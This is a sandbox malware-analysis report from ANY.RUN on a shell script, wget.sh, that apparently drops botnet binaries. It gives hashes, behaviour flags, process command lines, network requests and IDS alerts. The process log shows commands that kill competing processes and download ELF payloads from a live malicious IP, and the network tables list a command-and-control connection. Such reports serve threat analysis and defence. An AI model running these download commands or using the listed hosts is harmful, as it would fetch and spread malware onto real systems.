Malware analysis wget.sh Malicious activity | ANY.RUN

Add for printing

File name:	wget.sh
Full analysis:	https://app.any.run/tasks/b8db401f-7b4c-4be2-9162-8244d459e9df
Verdict:	Malicious activity
Analysis date:	December 14, 2024, 09:34:15
OS:	Ubuntu 22.04.2 LTS
MIME:	text/plain
File info:	ASCII text
MD5:	062C22DEEA864AD1320D9B4A2B8CDC35
SHA1:	256D89FFCDA6588F0AB4DCDD57D6F5D93F139752
SHA256:	1B1D43BFEB7DDF50B579FE3BDAF49504D2BB199972D01DA5A6679AE78CB3ABB9
SSDEEP:	48:1tLHBLbmLoRdLxGLzYqLCDLR7WDa5DNvUURhd0PYgmH94MAR0rYum+q3FiqvJ1MB:1xFsoLescYRV5hsUzuQgA9yttfHkTFv

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Add for printing

MALICIOUS
No malicious indicators.
SUSPICIOUS
- Executes the "rm" command to delete files or directories
  - bash (PID: 38754)
- Potential Corporate Privacy Violation
  - wget (PID: 38764)
  - wget (PID: 38792)
  - wget (PID: 38770)
  - wget (PID: 38783)
  - busybox (PID: 38820)
  - busybox (PID: 38808)
  - busybox (PID: 38815)
  - busybox (PID: 38824)
  - wget (PID: 38758)
  - wget (PID: 38833)
  - busybox (PID: 38827)
  - wget (PID: 38845)
  - wget (PID: 38839)
  - wget (PID: 38857)
  - wget (PID: 38864)
  - wget (PID: 38870)
  - busybox (PID: 38804)
  - wget (PID: 38798)
  - busybox (PID: 38812)
  - curl (PID: 38944)
  - curl (PID: 39003)
  - busybox (PID: 39116)
  - busybox (PID: 39134)
  - busybox (PID: 39137)
  - busybox (PID: 39140)
  - busybox (PID: 39131)
  - busybox (PID: 39125)
- Connects to unusual port
  - busybox (PID: 38808)
  - x86 (PID: 38773)
  - busybox (PID: 38804)
  - busybox (PID: 38815)
  - busybox (PID: 38827)
  - busybox (PID: 38820)
  - busybox (PID: 38812)
  - busybox (PID: 38824)
  - x86 (PID: 38848)
  - x86 (PID: 38971)
- Uses wget to download content
  - bash (PID: 38754)
- Executes commands using command-line interpreter
  - sudo (PID: 38753)
- Modifies file or directory owner
  - sudo (PID: 38750)
- Connects to the server without a host name
  - wget (PID: 38833)
  - wget (PID: 38857)
  - wget (PID: 38839)
  - wget (PID: 38851)
  - wget (PID: 38845)
  - wget (PID: 38864)
  - curl (PID: 38944)
  - wget (PID: 38870)
- Reads /proc/mounts (likely used to find writable filesystems)
  - curl (PID: 38944)
  - curl (PID: 39003)
INFO
No info indicators.

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

436

Monitored processes

228

Malicious processes

20

Suspicious processes

5

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
38749	/bin/sh -c "sudo chown user /tmp/wget\.sh && chmod +x /tmp/wget\.sh && DISPLAY=:0 sudo -iu user /tmp/wget\.sh "	/usr/bin/dash	—	any-guest-agent
User: root Integrity Level: UNKNOWN Exit code: 32512
38750	sudo chown user /tmp/wget.sh	/usr/bin/sudo	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
38751	chown user /tmp/wget.sh	/usr/bin/chown	—	sudo
User: root Integrity Level: UNKNOWN Exit code: 0
38752	chmod +x /tmp/wget.sh	/usr/bin/chmod	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
38753	sudo -iu user /tmp/wget.sh	/usr/bin/sudo	—	dash
User: root Integrity Level: UNKNOWN Exit code: 32512
38754	-bash --login -c \/tmp\/wget\.sh	/usr/bin/bash	—	sudo
User: user Integrity Level: UNKNOWN Exit code: 32512
38755	/usr/bin/locale-check C.UTF-8	/usr/bin/locale-check	—	bash
User: user Integrity Level: UNKNOWN Exit code: 0
38756	killall -9 mips	/usr/bin/killall	—	bash
User: user Integrity Level: UNKNOWN Exit code: 256
38757	killall -9 mips.s	/usr/bin/killall	—	bash
User: user Integrity Level: UNKNOWN Exit code: 256
38758	wget http://141.98.11.129/gay/mips	/usr/bin/wget		bash
User: user Integrity Level: UNKNOWN Exit code: 0

Add for printing

Executable files

0

Suspicious files

1

Text files

0

Unknown types

0

Dropped files

PID	Process	Filename		Type
38758	wget	/tmp/mips		o
		MD5:—	SHA256:—

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

22

TCP/UDP connections

53

DNS requests

11

Threats

105

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
—	—	GET	204	91.189.91.96:80	http://connectivity-check.ubuntu.com/	unknown	—	—	whitelisted
38776	wget	GET	404	141.98.11.129:80	http://141.98.11.129/gay/arm4	unknown	—	—	malicious
38839	wget	GET	200	141.98.11.129:80	http://141.98.11.129/gay/mpsl	unknown	—	—	malicious
—	—	GET	200	141.98.11.129:80	http://141.98.11.129/gay/mips	unknown	—	—	malicious
38833	wget	GET	200	141.98.11.129:80	http://141.98.11.129/gay/mips	unknown	—	—	malicious
39003	curl	GET	200	141.98.11.129:80	http://141.98.11.129/gay/arm5	unknown	—	—	malicious
38870	wget	GET	200	141.98.11.129:80	http://141.98.11.129/gay/arm7	unknown	—	—	malicious
38792	wget	GET	200	141.98.11.129:80	http://141.98.11.129/gay/arm6	unknown	—	—	malicious
38758	wget	GET	200	141.98.11.129:80	http://141.98.11.129/gay/mips	unknown	—	—	malicious
38798	wget	GET	200	141.98.11.129:80	http://141.98.11.129/gay/arm7	unknown	—	—	malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
484	avahi-daemon	224.0.0.251:5353	—	—	—	unknown
—	—	91.189.91.48:80	connectivity-check.ubuntu.com	Canonical Group Limited	US	whitelisted
—	—	91.189.91.96:80	connectivity-check.ubuntu.com	Canonical Group Limited	US	whitelisted
—	—	37.19.194.80:443	odrs.gnome.org	Datacamp Limited	DE	whitelisted
38758	wget	141.98.11.129:80	—	UAB Host Baltic	LT	malicious
38764	wget	141.98.11.129:80	—	UAB Host Baltic	LT	malicious
512	snapd	185.125.188.58:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
512	snapd	185.125.188.54:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
38770	wget	141.98.11.129:80	—	UAB Host Baltic	LT	malicious
38773	x86	85.239.34.134:31337	—	Alexhost Srl	US	unknown

DNS requests

Domain	IP	Reputation
connectivity-check.ubuntu.com	2620:2d:4000:1::98 2001:67c:1562::23 2620:2d:4002:1::197 2620:2d:4000:1::97 2001:67c:1562::24 2620:2d:4002:1::198 2620:2d:4000:1::22 2620:2d:4002:1::196 2620:2d:4000:1::2b 2620:2d:4000:1::23 2620:2d:4000:1::96 2620:2d:4000:1::2a 91.189.91.96 185.125.190.96 91.189.91.48 185.125.190.48 91.189.91.98 185.125.190.49 185.125.190.17 185.125.190.18 91.189.91.97 185.125.190.97 185.125.190.98 91.189.91.49	whitelisted
google.com	142.250.185.142 2a00:1450:4001:829::200e	whitelisted
odrs.gnome.org	37.19.194.80 169.150.255.184 195.181.170.18 195.181.175.41 212.102.56.178 169.150.255.180 207.211.211.26 2a02:6ea0:c700::19 2a02:6ea0:c700::11 2a02:6ea0:c700::112 2a02:6ea0:c700::21 2a02:6ea0:c700::18 2a02:6ea0:c700::101 2a02:6ea0:c700::107	whitelisted
api.snapcraft.io	185.125.188.58 185.125.188.55 185.125.188.59 185.125.188.54 2620:2d:4000:1010::6d 2620:2d:4000:1010::42 2620:2d:4000:1010::2e6 2620:2d:4000:1010::117	whitelisted
30.100.168.192.in-addr.arpa	—	unknown

Threats

PID	Process	Class	Message
—	—	Misc Attack	ET DROP Spamhaus DROP Listed Traffic Inbound group 23
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download

Add for printing

No debug info

General Info

wget.sh

062C22DEEA864AD1320D9B4A2B8CDC35

256D89FFCDA6588F0AB4DCDD57D6F5D93F139752

1B1D43BFEB7DDF50B579FE3BDAF49504D2BB199972D01DA5A6679AE78CB3ABB9

48:1tLHBLbmLoRdLxGLzYqLCDLR7WDa5DNvUURhd0PYgmH94MAR0rYum+q3FiqvJ1MB:1xFsoLescYRV5hsUzuQgA9yttfHkTFv

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

SUSPICIOUS

Executes the "rm" command to delete files or directories

Potential Corporate Privacy Violation

Connects to unusual port

Uses wget to download content

Executes commands using command-line interpreter

Modifies file or directory owner

Connects to the server without a host name

Reads /proc/mounts (likely used to find writable filesystems)

INFO

Malware configuration

Static information

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings